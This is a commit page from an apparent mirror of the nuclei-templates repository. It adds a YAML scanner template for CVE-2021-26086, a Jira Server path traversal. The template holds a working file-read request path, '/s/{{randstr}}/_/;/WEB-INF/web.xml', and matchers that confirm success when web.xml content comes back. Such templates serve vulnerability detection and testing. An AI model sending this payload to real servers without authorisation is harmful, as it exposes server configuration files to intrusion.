daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2492 from yabeow/master 

Create CVE-2021-26086.yaml
patch-1
Sandeep Singh 2021-08-26 16:23:03 +05:30 committed by GitHub
parent 3529aa15a2 7a2138a8c8
commit f34e048f73
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
cves/2021/CVE-2021-26086.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2021-26086
info:
name: Jira Limited Local File Read
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
reference:
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
tags: cve,cve2021,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and